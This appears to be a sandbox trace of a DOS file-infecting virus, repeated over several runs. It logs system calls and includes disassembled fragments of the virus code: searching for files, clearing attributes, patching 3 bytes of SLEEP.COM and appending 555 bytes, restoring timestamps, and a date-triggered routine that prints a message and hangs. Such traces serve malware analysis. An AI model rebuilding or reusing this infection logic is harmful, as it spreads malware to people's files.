2018-12-25T12:44:52.473928158Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.479354319Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.491783501Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.499223548Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.501001536Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.521033002Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.524298536Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.52728846Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.529226642Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.53861847Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.540427204Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.548164043Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.558951198Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.562179288Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.568056673Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.578889373Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.586367806Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.587806774Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.594955773Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.59697584Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.599649703Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.601980954Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.611032639Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.612789223Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.63380111Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.645197859Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.648113883Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.654171135Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.66550013Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.672950232Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.674605945Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.683042748Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.684418642Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.686941345Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.688918352Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.696750262Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.698127781Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.706192903Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.715904115Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.718671341Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.725220205Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.735150224Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.746829682Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.74936586Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.755783347Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.757575683Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.765696407Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.775537266Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.777855518Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.783346111Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.785064395Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.218401255Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.219657474Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.228821889Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.232655545Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.234631106Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.240711774Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.25374274Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.25946225Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.274692902Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.28441136Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.28594643Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.294343071Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.295667962Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.298653219Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.301278867Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.311054794Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.312174219Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.318649019Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.329397509Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.332035872Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.339032533Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.350179657Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.357463311Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.359100444Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.366424558Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.367696792Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.370375476Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.372286084Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.380963902Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.382552188Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.392654546Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.403489533Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.406640643Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.414621061Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.425654599Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.433431951Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.43632865Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.443926482Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.445569014Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.449445427Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.451282655Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.460262173Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.461944977Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.471042687Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.480433588Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.48364766Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.490776375Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.501626375Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.509308149Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.512022962Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.528780025Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.530549119Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.534988796Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.537278809Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.546328542Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.548726398Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.557598305Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.568583432Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.571719424Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.578125003Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.588632352Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.59617967Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.598680072Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.605810544Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.607383193Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.611036071Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.613200883Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.622424301Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.624563662Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.632730685Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.64339694Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.646987823Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.653304298Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.663955368Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.672309286Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.673698432Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.679617835Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.686638644Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.689409721Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.691145756Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.700761621Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.702282737Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.71043609Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.720850321Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.723766242Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.72968097Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.739774486Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.752614117Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.7540328Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.760766175Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.762259604Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.764891036Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.766510634Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.775726141Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.777502876Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.785906021Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.793026792Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.794841896Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.798490337Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.810049764Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.817182581Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.818556143Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.826280381Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.827813147Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.83548394Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.846792563Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.849314465Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.853760696Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.855879Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.295225208Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.297935826Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.300488461Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.303776268Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.307377137Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.313830887Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.325320659Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.331153297Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.348361664Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.359251981Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.360904913Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.368886856Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.37026767Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.373009059Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.375982648Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.389478286Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.392669207Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.401256771Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.410939489Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.413445033Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.419425523Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.428962678Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.435821156Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.437835101Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.444321077Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.445837829Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.449043841Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.450963269Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.467003134Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.478345039Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.491518471Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.504582158Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.507568846Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.513532435Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.523671228Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.53554833Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.538133393Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.544633342Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.546339078Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.549913882Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.552061071Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.560319931Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.562497628Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.570055011Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.579945814Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.583220009Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.588699025Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.598247258Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.60581661Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.607477132Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.613928787Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.616274161Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.619188151Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.621107966Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.630208725Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.632170556Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.645076902Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.662807699Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.666097717Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.672603875Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.683593994Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.690665881Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.692343869Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.699191682Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.700808849Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.703537887Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.705880793Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.714192883Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.716417374Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.724219966Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.731673049Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.734399012Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.740711075Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.750921706Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.757675731Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.759395249Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.766972002Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.76859228Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.771382313Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.77379731Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.782287386Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.784005416Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.791929532Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.802241524Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.804755532Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.81103899Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.820597944Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.826976723Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.829027576Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.835199571Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.836495014Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.839577283Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.84189999Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.849800618Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.852663348Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.860299235Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.872756027Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.876313996Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.882021467Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.891507624Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.898768309Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.900180108Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.906499316Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.908597364Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.915446376Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.923949434Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.927060494Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.931698606Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.933382304Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.571862208Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.574153867Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.577816241Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.581636968Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.58703116Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.594225323Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.601604539Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.605713796Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.618280837Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.625202246Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.628125592Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.639954951Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.641338221Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.643934377Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.656164338Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.671362328Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.673042465Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.681503079Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.69122635Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.694248264Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.700874996Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.710592444Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.716878431Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.718827829Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.725040516Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.72636973Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.729380568Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.731223532Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.739619852Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.741872466Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.749697116Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.759341438Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.762199846Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.768346795Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.777989242Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.784582732Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.786459753Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.792491997Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.79368111Z 64 PC: 12f15 | Write file or device (See above)
